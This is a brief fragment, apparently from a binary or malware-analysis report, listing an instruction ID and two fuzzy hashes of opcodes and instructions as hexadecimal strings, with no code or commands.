                                                                          • Instruction ID: 5c23398b3f93d3ebd27dce4c5d4f8ae33575a013c56ba48d74081d9e94485451
                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                          • Instruction Fuzzy Hash: E211D075904244DFDB12CF54D5C4B15BFA1FF44314F24C6A9E9894B252C33AD44ACFA1